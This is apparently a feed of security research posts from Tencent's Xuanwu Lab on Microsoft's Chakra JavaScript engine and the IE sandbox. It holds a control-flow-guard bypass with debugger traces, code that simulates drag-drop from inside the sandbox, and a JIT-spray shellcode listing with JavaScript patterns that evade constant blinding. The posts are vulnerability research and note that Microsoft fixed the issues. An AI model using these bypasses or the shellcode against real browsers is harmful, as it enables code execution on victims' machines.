0:010> u poi(06f2cea0)
chakra!Js::JavascriptExternalFunction::`vftable':

0:010> dd 06f2cea0 
06f2cea0  5f696c4c 06e6f7a0 00000000 00000000

0:010> dd poi(06f2cea0+4)
06e6f7a0  00000012 00000000 06e76c00 06f040a0
06e6f7b0  5f8c6130 00000000 5fb0b454 00000101

0:010> u poi(poi(06f2cea0+4)+0x10)
chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk:

These are the different call methods that chakra engine uses to call different types of functions.

0x02 Vulnerability and Exploitation

After describing how the chakra engine calls all sorts of functions, we will now look at the CFG vulnerability itself. As mentioned above, the first call of a function differs from the subsequent ones. Let’s look at the logic here; the following is the call stack:

//the first call
chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-chakra!Js::JavascriptFunction::DeferredParsingThunk
            |-chakra!Js::JavascriptFunction::DeferredParse    //obtain NativeCodeGenerator::CheckCodeGenThunk function
            |-chakra!NativeCodeGenerator::CheckCodeGenThunk
                |-chakra!Js::InterpreterStackFrame::DelayDynamicInterpreterThunk
                    |-jmp_code  
                        |-chakra!Js::InterpreterStackFrame::InterpreterThunk

What was not discussed above is the Js::JavascriptFunction::DeferredParse function in this process. The parsing work is done in this function, and it returns the pointer to NativeCodeGenerator::CheckCodeGenThunk. Control then returns to Js::JavascriptFunction::DeferredParsingThunk, which calls that pointer. The pointer to NativeCodeGenerator::CheckCodeGenThunk is also obtained by resolving the Js::JavascriptFunction object. Here is the code.

int __cdecl Js::JavascriptFunction::DeferredParsingThunk(struct Js::ScriptFunction *p_script_function)
{
  NativeCodeGenerator_CheckCodeGenThunk = Js::JavascriptFunction::DeferredParse(&p_script_function);
  return NativeCodeGenerator_CheckCodeGenThunk();
}
.text:002AB3F0 push    ebp
.text:002AB3F1 mov     ebp, esp
.text:002AB3F3 lea     eax, [esp+p_script_function]
.text:002AB3F7 push    eax             ; struct Js::ScriptFunction **
.text:002AB3F8 call    Js::JavascriptFunction::DeferredParse
.text:002AB3FD pop     ebp
.text:002AB3FE jmp     eax

At this jump, no CFG check is made on the function pointer in eax. Therefore, it can be used to hijack eip. But first we need to know how the NativeCodeGenerator::CheckCodeGenThunk function pointer returned by Js::JavascriptFunction::DeferredParse is resolved from the Js::ScriptFunction object. Here is the resolution process.

0:010> u poi(070af050)
chakra!Js::ScriptFunction::`vftable':

0:010> dd 070af050 + 14
070af064  076690e0 5fb11ef4 00000000 00000000

0:010> dd 076690e0 + 10
076690f0  076690e0 04186628 07065f90 00000000

0:010> dd 076690e0 + 28
07669108  07010dc0 000001a8 00000035 00000000

0:010> dd 07010dc0 
07010dc0  5f696000 05a452b8 00000000 5f8db9e0

0:010> u 5f8db9e0
chakra!NativeCodeGenerator::CheckCodeGenThunk:

As shown above, Js::JavascriptFunction::DeferredParse gets the NativeCodeGenerator::CheckCodeGenThunk function pointer by resolving the Js::ScriptFunction object. The pointer is read from the location [[[Js::ScriptFunction+14]+10]+28]+0c (offsets in hexadecimal). So by forging the data in this memory and then calling the function, we trigger the call to Js::JavascriptFunction::DeferredParse and hijack eip, as shown below.
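The pointer chain can be replayed on the values from the debugger output. The sketch below models memory as a map from address to dword, which is purely an illustration device; the function names are hypothetical and the offsets are the ones from the chain above.

```cpp
#include <cassert>
#include <cstdint>
#include <map>

using Memory = std::map<std::uint32_t, std::uint32_t>;  // address -> dword

std::uint32_t readDword(const Memory& mem, std::uint32_t addr) {
    auto it = mem.find(addr);
    assert(it != mem.end());
    return it->second;
}

// Reads the dword stored at [[[obj+0x14]+0x10]+0x28]+0x0c.
std::uint32_t resolveThunkPointer(const Memory& mem, std::uint32_t scriptFunction) {
    std::uint32_t p1 = readDword(mem, scriptFunction + 0x14);
    std::uint32_t p2 = readDword(mem, p1 + 0x10);
    std::uint32_t p3 = readDword(mem, p2 + 0x28);
    return readDword(mem, p3 + 0x0c);
}

// Memory contents copied from the debugger output in the text.
Memory dumpFromText() {
    return {
        {0x070af064u, 0x076690e0u},
        {0x076690f0u, 0x076690e0u},
        {0x07669108u, 0x07010dc0u},
        {0x07010dccu, 0x5f8db9e0u},
    };
}
```

With the original contents the chain resolves to 0x5f8db9e0, the address of CheckCodeGenThunk in that session. Overwriting the last dword changes the address that the unchecked jmp eax transfers control to.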

0:010> g
Breakpoint 0 hit
eax=603ba064 ebx=063fba10 ecx=063fba40 edx=063fba40 esi=00000001 edi=058fc6b0
eip=603ba064 esp=058fc414 ebp=058fc454 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
chakra!`dynamic initializer for 'DOMFastPathInfo::getterTable''+0x734:
603ba064 94              xchg    eax,esp
603ba065 c3              ret

In this way, CFG is bypassed and eip is hijacked. This method is simple and stable, and convenient to use once you are able to read and write memory. This vulnerability was reported to Microsoft on 25 July 2015.

0x03 Mitigation

Microsoft has fixed all the vulnerabilities in this post. The mitigation is relatively simple: a CFG check is added at this jump.

.text:002AB460 push    ebp
.text:002AB461 mov     ebp, esp
.text:002AB463 lea     eax, [esp+arg_0]
.text:002AB467 push    eax
.text:002AB468 call    Js::JavascriptFunction::DeferredParse
.text:002AB46D mov     ecx, eax        ; this
.text:002AB46F call    ds:___guard_check_icall_fptr  //add cfg check
.text:002AB475 mov     eax, ecx
.text:002AB477 pop     ebp
.text:002AB478 jmp     eax
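The effect of the added check can be modelled as follows. This is a simplification under stated assumptions: real CFG consults a bitmap of valid call targets and fails fast on a mismatch, whereas the sketch uses a plain set and a boolean result. Both function names are hypothetical.

```cpp
#include <cassert>
#include <cstdint>
#include <set>

// Simplified stand-in for the CFG bitmap: the set of valid indirect-call targets.
using ValidTargets = std::set<std::uint32_t>;

// Unpatched behaviour: `jmp eax` with no validation of the target.
std::uint32_t uncheckedJump(std::uint32_t target) {
    return target;
}

// Patched behaviour: the guard check runs before the jump. Returning false
// stands in for the process termination a failed check would cause.
bool checkedJump(const ValidTargets& valid, std::uint32_t target, std::uint32_t& eip) {
    if (valid.count(target) == 0) {
        return false;
    }
    eip = target;
    return true;
}
```

With only the legitimate thunk address registered as valid, the gadget address used in the hijack above is rejected before eip can be changed.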

Reference

  1. 《Bypass DEP and CFG using JIT compiler in Chakra engine》

  2. 《spartan 0day & exploit》

]]>
Drag & Drop Security Policy of IE Sandbox http://xlab.tencent.com/en/2015/12/18/drag-drop-security-policy-of-ie-sandbox/ Fri, 18 Dec 2015 11:03:51 +0000 http://xlab.tencent.com/en/?p=82 Continue reading "Drag & Drop Security Policy of IE Sandbox"]]>

There is a class of vulnerability that uses flaws in the whitelisted applications of the ElevationPolicy settings to bypass the sandbox. A DragDrop policy setting in the IE registry, similar to ElevationPolicy, caught our attention. In this post, the writer takes the perspective of an attacker trying every possible means to break out of the IE sandbox, and analyzes each obstacle along the way to detail the drag drop security policy of the IE sandbox.

0x01 DragDrop Policy of IE sandbox

Among all IE sandbox bypass techniques, there’s one that uses the issue of whitelist applications in ElevationPolicy to execute arbitrary code. In the registry, there is a configuration called DragDrop similar to ElevationPolicy. The specific registry path is:

HKLM\Software\Microsoft\Internet Explorer\Low Rights\DragDrop

As shown in the figure:

Here are the meanings for values of the DragDrop policy:

0: The target window is not a valid DropTarget; reject the drop;

1: The target window is a valid DropTarget, but contents cannot be copied;

2: Use a popup to ask for the user’s permission. If allowed, copy contents to the target window;

3: Allow silent drag drop.
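The four values can be read as a small decision table. The sketch below is only a model of the descriptions above: the enumerator and function names are hypothetical, and treating unknown values as a rejection is an assumption, not documented behaviour.

```cpp
#include <cassert>

enum class DropDecision { Rejected, CopyBlocked, Allowed };

// Maps a DragDrop policy value to the outcome of a drop. `userApproves` is
// only consulted for policy value 2, where IE shows a prompt.
DropDecision decideDrop(int policyValue, bool userApproves) {
    switch (policyValue) {
        case 0:  return DropDecision::Rejected;     // not a valid DropTarget
        case 1:  return DropDecision::CopyBlocked;  // valid target, no copy
        case 2:  return userApproves ? DropDecision::Allowed
                                     : DropDecision::Rejected;
        case 3:  return DropDecision::Allowed;      // silent drag drop
        default: return DropDecision::Rejected;     // assumption: be restrictive
    }
}
```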

In a clean Windows 8.1 installation, there are 3 applications under the DragDrop key by default: iexplore.exe, explorer.exe and notepad.exe. The policy value for each is 3. When the policy value of the target application is 2 and a file is dragged to the target window, IE pops up a prompt like this:

0x02 DragDrop Issue for the Explorer process

When files are dragged from IE to Explorer, IE won’t pop up anything because the DragDrop policy value is set to 3, but the Explorer process will pop up a prompt like this:

However, when we drag files from IE to the folder tree in Explorer’s sidebar, no prompt pops up. This may be an imperfection in the implementation of Explorer. On second thought, if we can simulate the mouse operations of drag and drop inside the IE sandbox, we will be able to use this Explorer issue to cross the security boundary of the IE sandbox.

0x03 Finish OLE Drag Drop without the Mouse

OLE dragdrop is a generic file dragging method. It implements drag and drop operations on top of OLE interfaces, making it generic and modular. The OLE dragdrop technique includes three basic interfaces:

  • IDropSource Interface: represents the source object where the dragdrop operation is issued, implemented by source object;

  • IDropTarget Interface: represents the target object on which the dragdrop operation is taken, implemented by target object;

  • IDataObject Interface: represents the data transferred during the dragdrop operation, implemented by source object;

This figure describes the key components required by a complete OLE dragdrop operation:

To simulate the drag and drop operations of a mouse, all we need is to implement the IDropSource interface and the IDataObject interface. The core of a normal OLE dragdrop operation is a call to the ole32!DoDragDrop function. Here is the function prototype:

HRESULT DoDragDrop(
   IDataObject *pDataObject,   // Pointer to the data object
   IDropSource *pDropSource,   // Pointer to the source
   DWORD       dwOKEffect,     // Effects allowed by the source
   DWORD       *pdwEffect      // Pointer to effects on the source
);

Information on the source object and the data of the dragdrop operation is passed in the parameters of DoDragDrop. Within the DoDragDrop function, the position of the mouse pointer is used to obtain information about the target object. In the following, the writer gives a method that uses code instead of the mouse to perform the dragdrop operation.

To simulate a mouse dragdrop operation in code, we isolate the GUI part of the DoDragDrop function, find the function that actually performs the dragdrop operation, and pass it the required parameters. I’ll illustrate the internal implementation of DragDrop using ole32.dll 6.1.7601.18915 from Win7.

Here is the main logic of Ole32!DoDragDrop:

HRESULT __stdcall DoDragDrop(LPDATAOBJECT pDataObj, LPDROPSOURCE pDropSource, DWORD dwOKEffects, LPDWORD pdwEffect)
{
    CDragOperation drgop;
    HRESULT hr;

    CDragOperation::CDragOperation(drgop, pDataObj, pDropSource, dwOKEffects, pdwEffect, hr);
    if ( hr >= 0 ){
      // Keep tracking the drag until one of the three steps reports that it is over
      while ( CDragOperation::UpdateTarget(drgop)
        && CDragOperation::DragOver(drgop)
        && CDragOperation::HandleMessages(drgop) )
        ;
      hr = CDragOperation::CompleteDrop(drgop);
    }
    CDragOperation::~CDragOperation(drgop);

    return hr;
}


CDragOperation::CDragOperation is the constructor. Its important initialization steps include:

ole32!GetMarshalledInterfaceBuffer
ole32!ClipSetCaptureForDrag
    --ole32!GetPrivateClipboardWindow
ole32!CreateSharedDragFormats

The while loop that follows tracks the dragdrop status. Finally, CompleteDrop completes the operation. The key function calls are:

ole32!CDragOperation::UpdateTarget
  --ole32!CDragOperation::GetDropTarget
       --ole32!PrivDragDrop
ole32!CDragOperation::DragOver
  --ole32!CDropTarget::DragOver
       --ole32!PrivDragDrop
ole32!CDragOperation::CompleteDrop
  --ole32!CDropTarget::Drop
       --ole32!PrivDragDrop

As can be seen, it is the ole32!PrivDragDrop function that finally performs the dragdrop operation. The internal functions in ole32.dll can be called by using hardcoded offsets of their addresses. We define a DropData function to simulate the dragdrop operation from the mouse. Its input parameters are the target window handle and the IDataObject pointer of the file being dragged. The main logic is as follows:

auto DropData(HWND hwndDropTarget, IDataObject* pDataObject)
{
    GetPrivateClipboardWindow(CLIP_CREATEIFNOTTHERE);
    CreateSharedDragFormats(pDataObject);
    void *DOBuffer = nullptr;
    HRESULT result = GetMarshalledInterfaceBuffer(IID_IDataObject, pDataObject, DOBuffer);

    if (SUCCEEDED(result)){
        DWORD dwEffect = 0;
        POINTL ptl = { 0, 0 };
        void *hDDInfo = nullptr;
        // Assign to the outer result (no redeclaration) so that the caller
        // sees the status of the last step that ran
        result = PrivDragDrop(hwndDropTarget, DRAGOP_ENTER, DOBuffer, pDataObject, MK_LBUTTON, ptl, dwEffect, 0, hDDInfo);
        if (SUCCEEDED(result)){
            result = PrivDragDrop(hwndDropTarget, DRAGOP_OVER, 0, 0, MK_LBUTTON, ptl, dwEffect, 0, hDDInfo);
            if (SUCCEEDED(result)){
                HWND hClip = GetPrivateClipboardWindow(CLIP_QUERY);
                result = PrivDragDrop(hwndDropTarget, DRAGOP_DROP, DOBuffer, pDataObject, 0, ptl, dwEffect, hClip, hDDInfo);
            }
        }
    }
    return result;
}

The target window handle can be obtained through the FindWindow function. There are two methods to pack a DataObject and get the pointer of its IDataObject interface:

  • Write your own C++ class to implement the IDataObject interface;

  • Use the existing implementation in the class library, for instance, both MFC and Shell32 provide related class to implement the DragDrop interface.

The following shows how to use the MFC class library to pack a DataObject and get the pointer to its IDataObject interface. Here is the implementation code:

auto GetIDataObjectForFile(CString filePath)
{
    COleDataSource* pDataSource = new COleDataSource();
    IDataObject*    pDataObject = nullptr;
    UINT            uBuffSize = 0;
    HGLOBAL         hgDrop;
    DROPFILES*      pDrop;
    TCHAR*          pszBuff;
    FORMATETC       fmtetc = { CF_HDROP, NULL, DVASPECT_CONTENT, -1, TYMED_HGLOBAL };

    // DROPFILES header + path + two terminators (end of string, end of list)
    uBuffSize = sizeof(DROPFILES) + sizeof(TCHAR) * (lstrlen(filePath) + 2);
    hgDrop = GlobalAlloc(GHND | GMEM_SHARE, uBuffSize);
    if (hgDrop != nullptr){
        pDrop = (DROPFILES*)GlobalLock(hgDrop);
        if (pDrop != nullptr){
            pDrop->pFiles = sizeof(DROPFILES);
#ifdef _UNICODE
            pDrop->fWide = TRUE;
#endif
            pszBuff = (TCHAR*)(LPBYTE(pDrop) + sizeof(DROPFILES));
            lstrcpy(pszBuff, (LPCTSTR)filePath);
            GlobalUnlock(hgDrop);
            pDataSource->CacheGlobalData(CF_HDROP, hgDrop, &fmtetc);
            pDataObject = (IDataObject *)pDataSource->GetInterface(&IID_IDataObject);
        }else{
            GlobalFree(hgDrop);   // lock failed: release the allocation
        }
    }
    return pDataObject;
}

0x04 Drag Drop Implementation of IE Sandbox

When a dragdrop operation is performed with the mouse in the IE sandbox, the IE tab process inside the sandbox transfers the data to the main process outside the sandbox through ShdocvwBroker. In other words, the actual dragdrop operation is completed in the IE main process outside the sandbox. The call chains in the two processes look roughly like this:

IE sub process (inside the sandbox):

MSHTML!CDoc::DoDrag
--MSHTML!CDragDropManager::DoDrag
    --combase!ObjectStubless
        -- … send ALPC message to IE main process

IE main process:

… receive the ALPC message from IE sub process
--RPCRT4!Invoke
    --IEFRAME!CShdocvwBroker::PerformDoDragDrop
        --IEFRAME!CShdocvwBroker::PerformDoDragDropThreadProc
            --ole32!DoDragDrop

0x05 Security Limits that IE Sandbox Applies to the Drag Drop Operation

Inside the IE sandbox, we can call Broker functions directly. By creating an IEUserBroker and using it to create a ShdocvwBroker, we can call the IEFRAME!CShdocvwBroker::PerformDoDragDrop function in the main process. The call looks like this:

typedef HRESULT(__stdcall *FuncCoCreateUserBroker)(IIEUserBroker **ppBroker);
IIEUserBrokerPtr CreateIEUserBroker()
{
    HMODULE hMod = LoadLibraryW(L"iertutil.dll");
    if (hMod == nullptr)
        return nullptr;
    // Resolve CoCreateUserBroker by ordinal (58).
    FuncCoCreateUserBroker CoCreateUserBroker;
    CoCreateUserBroker = (FuncCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58);
    if (CoCreateUserBroker)
    {
        IIEUserBrokerPtr broker;
        HRESULT ret = CoCreateUserBroker(&broker);
        if (SUCCEEDED(ret))
            return broker;
    }
    return nullptr;
}

IIEUserBrokerPtr broker = CreateIEUserBroker();
IShdocvwBroker* shdocvw = nullptr;
broker->BrokerCreateKnownObject(clsid_CIERecoveryStore, __uuidof(IRecoveryStore), (IUnknown**)&shdocvw);
// Prototype of the broker method that is called next:
shdocvw->PerformDoDragDrop(HWND__ *, IEDataObjectWrapper *, IEDropSourceWrapper *, ulong, ulong, ulong *, long *);

The dragdrop operation is eventually carried out by calling ole32!DoDragDrop, and all the parameters that DoDragDrop requires can be passed in through PerformDoDragDrop (refer to the parameter description of DoDragDrop in chapter 0x03). At this point we can already reach ole32!DoDragDrop outside the sandbox from inside it and pass controllable parameters. What remains is to simulate the mouse part of the dragdrop operation, for which there are two candidate methods:

  • Use the method mentioned in chapter 0x02 to directly call the internal functions in ole32.dll;

  • Call an API to change the position of the mouse.

For the first method, since we are in the sandbox, the only way out of the sandbox and into the address space of the IE main process is through the proxy of the Broker interface. We therefore cannot call internal functions of a DLL in the main process, so this method is not feasible.

For the second method, if we could change the position of the mouse, ole32!DoDragDrop would use the mouse position to find the target window. However, our experiments show that the mouse position cannot be changed through an API from inside the sandbox. The following explains why.

The writer can think of two ways to change the mouse position:

1. Simulate mouse movement through the SendInput function. The call chain of SendInput from user mode to kernel mode is:

user32!SendInput
--user32!NtUserSendInput
    --win32k.sys!NtUserSendInput
        --win32k.sys!xxxSendInput
            --win32k.sys!xxxMouseEventDirect

2. Change the mouse position through the SetCursorPos function. The call chain of SetCursorPos from user mode to kernel mode is:

user32!SetCursorPos
--user32!SetPhysicalCursorPos
    --user32!NtUserCallTwoParam
        --win32k.sys!NtUserCallTwoParam
            --win32k.sys!zzzSetCursorPos
                --win32k.sys!zzzSetCursorPosByType

First, SendInput. Calling SendInput directly in the IE sandbox returns error 0x5 (access denied), because SendInput is hooked by IEShims.dll and the call is handled by the hook function.

This hook is easy to bypass by calling NtUserSendInput directly. That function is not exported, so its address has to be hardcoded as an offset. Calling NtUserSendInput directly returns no error, but the position of the mouse does not change: the call is blocked by UIPI (User Interface Privilege Isolation). The same happens when calling SetCursorPos.

UIPI is a security feature introduced in Windows Vista. It is implemented in the Windows kernel, at the following location:

win32k!CheckAccessForIntegrityLevel

In Win8.1, this is the logic of the function:

signed int __stdcall CheckAccessForIntegrityLevelEx(
            unsigned int CurrentProcessIntegrityLevel, 
            int          CurrentIsAppContainer, 
            unsigned int TargetProcessIntegrityLevel, 
            int          TargetIsAppContainer)
{
    signed int result;
    if ( gbEnforceUIPI && CurrentProcessIntegrityLevel < TargetProcessIntegrityLevel )
        result = 0;
    else if ( gbEnforceUIPI && CurrentProcessIntegrityLevel == TargetProcessIntegrityLevel )
        result = (CurrentIsAppContainer == TargetIsAppContainer || 
                  TargetIsAppContainer == -1 || 
                  CurrentIsAppContainer == -1) || 
                 SeIsParentOfChildAppContainer(
                    gSessionId, 
                    CurrentIsAppContainer, 
                    TargetIsAppContainer);
    else
        result = 1;
    return result;
}

This function first compares the integrity levels of the source process and the target process. If the integrity level of the source process is lower than that of the target process, the request is rejected; if it is higher, the request is permitted. If the two integrity levels are equal, the function compares the AppContainer attributes: the request is permitted if they are identical or if either of them is -1; otherwise SeIsParentOfChildAppContainer decides whether the two processes satisfy the restriction. If they do, the request is permitted; if not, it is rejected. When gbEnforceUIPI is not set, every request is permitted.

Note: parameters such as ProcessIntegrityLevel and IsAppContainer are extracted from the EPROCESS->Win32Process structure, which is an internal structure. SeIsParentOfChildAppContainer is an internal function in ntoskrnl.
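To make the decision table easier to follow, here is a minimal portable model of the check described above. It is a sketch, not the win32k code: the name CheckAccessModel, the container id constants and the ParentCheck callback (standing in for SeIsParentOfChildAppContainer) are assumptions introduced for illustration. The integrity level constants use the well-known Low (0x1000) and Medium (0x2000) RID values.

```cpp
#include <cassert>
#include <cstdint>
#include <functional>

// Well-known integrity level RIDs.
constexpr std::uint32_t kLowIL = 0x1000;
constexpr std::uint32_t kMediumIL = 0x2000;

// Hypothetical container ids used only by this model.
constexpr int kNoAppContainer = 0;
constexpr int kUnknownContainer = -1;  // the -1 wildcard seen in the decompiled code

// Stand-in for nt!SeIsParentOfChildAppContainer (assumed shape, not the real signature).
using ParentCheck = std::function<bool(int current, int target)>;

// Returns true when the source process may send input to the target process.
bool CheckAccessModel(bool enforceUipi,
                      std::uint32_t currentIL, int currentContainer,
                      std::uint32_t targetIL, int targetContainer,
                      const ParentCheck& isParentOfChild) {
    if (!enforceUipi) return true;           // UIPI switched off: always permit
    if (currentIL < targetIL) return false;  // lower IL may not drive higher IL
    if (currentIL > targetIL) return true;   // higher IL may drive lower IL
    // Equal IL: fall back to the AppContainer comparison.
    if (currentContainer == targetContainer ||
        targetContainer == kUnknownContainer ||
        currentContainer == kUnknownContainer) {
        return true;
    }
    return isParentOfChild(currentContainer, targetContainer);
}

void DemoUipi() {
    const ParentCheck unrelated = [](int, int) { return false; };
    // Sandboxed IE tab (Low IL) targeting a Medium IL window: rejected.
    assert(!CheckAccessModel(true, kLowIL, kNoAppContainer, kMediumIL, kNoAppContainer, unrelated));
    // Medium IL process targeting a Low IL window: permitted.
    assert(CheckAccessModel(true, kMediumIL, kNoAppContainer, kLowIL, kNoAppContainer, unrelated));
    // Same IL, different unrelated containers: rejected.
    assert(!CheckAccessModel(true, kLowIL, 1, kLowIL, 2, unrelated));
}
```

The first assertion in DemoUipi corresponds to the situation in this post: input injected from the Low IL tab process toward a higher integrity window is rejected before the mouse position is touched.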

0x06 Summary

This post details the security policy that the IE sandbox applies to dragdrop operations. It covers the restrictions the IE sandbox places on dragdrop, the problems the Explorer process has with dragdrop, how ole32.dll implements dragdrop internally, how IE implements dragdrop in the sandbox, and where and how the security restrictions are enforced. The IE sandbox restricts dragdrop operations effectively by hooking specific functions in IEShims.dll and by relying on the UIPI feature of Windows (Windows Vista and later).

0x07 Reference

  1. Understanding and Working in Protected Mode Internet Explorer

  2. OLE Drag and Drop

  3. How to Implement Drag and Drop between Your Program and Explorer

  4. WINDOWS VISTA UIPI

0x08 Acknowledgement

Thanks to Wins0n for helping me with reversing ole32, and to FlowerCode for helping me think through the approach and resolve difficulties.

Translated by WooYun Drops.
Bypass DEP and CFG using JIT compiler in Chakra engine http://xlab.tencent.com/en/2015/12/09/bypass-dep-and-cfg-using-jit-compiler-in-chakra-engine/ Wed, 09 Dec 2015 05:19:41 +0000

JIT Spray is a popular exploitation technique that first appeared in 2010. It embeds shellcode as immediate values in the executable code that the JIT compiler generates. Currently, all major JIT engines, including Chakra, have many mitigations in place against this technique, such as random NOP instruction insertion and constant blinding.

This article points out two weaknesses in Chakra’s JIT Spray mitigation (in Windows 8.1 and older operating systems, and Windows 10, respectively), allowing attackers to use JIT Spray to execute shellcode, bypassing DEP. I will also discuss a method to bypass CFG using Chakra’s JIT compiler.

0x01 Constant Blinding

Constant blinding is the most important mitigation strategy against JIT Spray. The Chakra engine XORs every user-supplied immediate value that is not 0x0000 or 0xFFFF with a randomly generated key, and decrypts it on the fly. For example, the following JavaScript:

...
a ^= 0x90909090;
a ^= 0x90909090;
a ^= 0x90909090;
...

Generates machine code like this:

...
096b0091 ba555593c5      mov     edx,0C5935555h
096b0096 81f2c5c50355    xor     edx,5503C5C5h
096b009c 33fa            xor     edi,edx
096b009e bab045edfb      mov     edx,0FBED45B0h
096b00a3 81f220d57d6b    xor     edx,6B7DD520h
096b00a9 33fa            xor     edi,edx
096b00ab baef85f139      mov     edx,39F185EFh
096b00b0 81f27f1561a9    xor     edx,0A961157Fh
096b00b6 33fa            xor     edi,edx
...

The immediate value in the resulting machine code is unpredictable, thus shellcode embedding is not possible.
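The relationship between the two immediates in each mov/xor pair can be checked by hand. The following sketch models it in portable C++; the names BlindedImm, Blind and Unblind are assumptions made for this example, and how Chakra actually draws its random key is not covered here.

```cpp
#include <cassert>
#include <cstdint>

// The two immediates that end up in the generated code for one blinded constant.
struct BlindedImm {
    std::uint32_t stored;  // immediate of the `mov edx, ...`
    std::uint32_t key;     // immediate of the following `xor edx, ...`
};

// Blind a user-controlled constant with a key chosen by the JIT.
constexpr BlindedImm Blind(std::uint32_t value, std::uint32_t key) {
    return BlindedImm{value ^ key, key};
}

// What the emitted mov/xor pair computes at run time.
constexpr std::uint32_t Unblind(BlindedImm b) {
    return b.stored ^ b.key;
}

void DemoConstantBlinding() {
    // Immediate pairs copied from the disassembly above; each recovers 0x90909090.
    assert(Unblind({0xC5935555u, 0x5503C5C5u}) == 0x90909090u);
    assert(Unblind({0xFBED45B0u, 0x6B7DD520u}) == 0x90909090u);
    assert(Unblind({0x39F185EFu, 0xA961157Fu}) == 0x90909090u);
}
```

All three pairs decode to the same 0x90909090 even though none of the six immediates in the machine code contains that value, which is why the attacker cannot predict the emitted bytes.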

0x02 Bypass Chakra’s Constant Blinding on Windows 8.1 or Older Operating Systems

Internally, the Chakra engine stores an integer n as n*2+1. When evaluating the expression n=n+m, it is not necessary to restore the original value of n before adding m; the result can be obtained by directly adding m*2 to n*2+1. The Chakra engine on Windows 8.1 and older operating systems treats m*2 as self-generated data rather than user input, so constant blinding does not apply. For the following JavaScript code:

...
a += 0x18EB9090/2;
a += 0x18EB9090/2;
...

When certain conditions are met, it can generate machine code like this:

...
05010090 81c19090eb18    add     ecx,18EB9090h
05010096 0f80d6010000    jo      05010272
0501009c 8bf9            mov     edi,ecx
0501009e 8b5dbc          mov     ebx,dword ptr [ebp-44h]
050100a1 f6c301          test    bl,1
050100a4 0f8413020000    je      050102bd
050100aa 8bcb            mov     ecx,ebx
050100ac 81c19090eb18    add     ecx,18EB9090h
050100b2 0f8005020000    jo      050102bd
050100b8 8bf9            mov     edi,ecx
050100ba 8b5dbc          mov     ebx,dword ptr [ebp-44h]
050100bd f6c301          test    bl,1
050100c0 0f8442020000    je      05010308
050100c6 8bcb            mov     ecx,ebx
...
0:017> u 05010090 + 2 l 3
05010092 90              nop
05010093 90              nop
05010094 eb18            jmp     050100ae
0:017> u 050100ae l 3
050100ae 90              nop
050100af 90              nop
050100b0 eb18            jmp     050100ca

If every instruction in our shellcode is at most 2 bytes long, the shellcode can be embedded in the immediate values. The actual immediate value is twice the value written in JavaScript, so when a 2-byte instruction is used its first byte must be even, which is not very hard to satisfy.

0x5854   // push esp--pop eax    ; eax = esp, make eax writeable
0x5252   // push edx--push edx   ; esp -= 8
0x016A   // push 1
0x4A5A   // pop  edx--dec edx    ; edx = 0
0x5E52   // push edx--pop esi    ; esi = 0
0x40B6   // mov  dh, 0x40        ; edx = 0x4000, NumberOfBytesToProtect
0x5452   // push edx--push esp   ; *esp = &NumberOfBytesToProtect
0x5B90   // pop  ebx             ; ebx = &NumberOfBytesToProtect
0x14B6   // mov  dh, 0x14
0x14B2   // mov  dl, 0x14
0x5266   // push dx
0x5666   // push si              ; *esp = 0x14140000
0x525A   // pop  edx--push edx   ; edx = 0x14140000
0x5E54   // push esp--pop  esi   ; esi = &BaseAddress, 
0x5454   // push esp--push esp   ; push &OldAccessProtection 
0x406A   // push 0x40            ; PAGE_EXECUTE_READWRITE
0x5390   // push ebx             ; push  &NumberOfBytesToProtect
0x5690   // push esi             ; push &BaseAddress
0xFF6A   // push -1              ; 
0x5252   // push edx--push edx   ; set ret addr
0x5290   // push edx             ; prepare esp for fs:[esi]
0x016A   // push 1
0x4A5A   // pop  edx--dec edx    ; edx = 0
0xC0B2   // mov  dl, 0xC0
0x5E52   // push edx--pop esi
0x5F54   // push esp--pop edi
0xA564   // movs dword ptr [edi], dword ptr fs:[esi] ; *esp = *(fs:0xC0)
0x4FB2   // mov  dl, 0x4F        ; NtProtectVirtualMemory, Win8.1:0x4F, Win10:0x50
0x5290   // push edx
0xC358   // pop  eax--ret        ; ret to syscall
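The arithmetic behind the unblinded add immediate can be sketched as follows. This is a simplified model using unsigned 32-bit values (the real code works on signed values and bails out on overflow via the jo instructions shown earlier); Tag, AddImmediate and LittleEndian are names invented for this example.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

// Tagged representation described above: integer n is stored as n*2+1.
constexpr std::uint32_t Tag(std::uint32_t n) { return n * 2u + 1u; }

// Immediate that can be added directly to a tagged value to implement `n += m`.
constexpr std::uint32_t AddImmediate(std::uint32_t m) { return m * 2u; }

// Byte order in which a 32-bit immediate appears in x86 machine code.
std::array<std::uint8_t, 4> LittleEndian(std::uint32_t v) {
    return {static_cast<std::uint8_t>(v), static_cast<std::uint8_t>(v >> 8),
            static_cast<std::uint8_t>(v >> 16), static_cast<std::uint8_t>(v >> 24)};
}

void DemoTaggedAdd() {
    const std::uint32_t m = 0x18EB9090u / 2u;  // constant written in the JavaScript
    // The immediate seen in `add ecx,18EB9090h`.
    assert(AddImmediate(m) == 0x18EB9090u);
    // Adding m*2 to the tagged n yields the tagged n+m, no untagging needed.
    const std::uint32_t n = 5u;
    assert(Tag(n) + AddImmediate(m) == Tag(n + m));
    // In memory the immediate reads 90 90 EB 18: nop, nop, jmp +0x18.
    const std::array<std::uint8_t, 4> expected = {0x90, 0x90, 0xEB, 0x18};
    assert(LittleEndian(AddImmediate(m)) == expected);
    // m*2 is always even, so the lowest (first) byte of the immediate is even.
    assert((LittleEndian(AddImmediate(m))[0] & 1u) == 0u);
}
```

The last assertion is the constraint mentioned before the shellcode listing: because the immediate is m*2, its first byte in memory can never be odd.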

0x03 Bypass Chakra’s Constant Blinding on Windows 10

The Chakra engine on Windows 10 does not suffer from this issue. However, in order to generate highly optimized code when writing to an integer array, the following JavaScript code:

var ar = new Uint16Array(0x10000);
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
...

Generates the following machine code:

...
0b8110e0 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110e9 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110f2 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110fb 66c786909000009090 mov   word ptr [esi+9090h],9090h
...

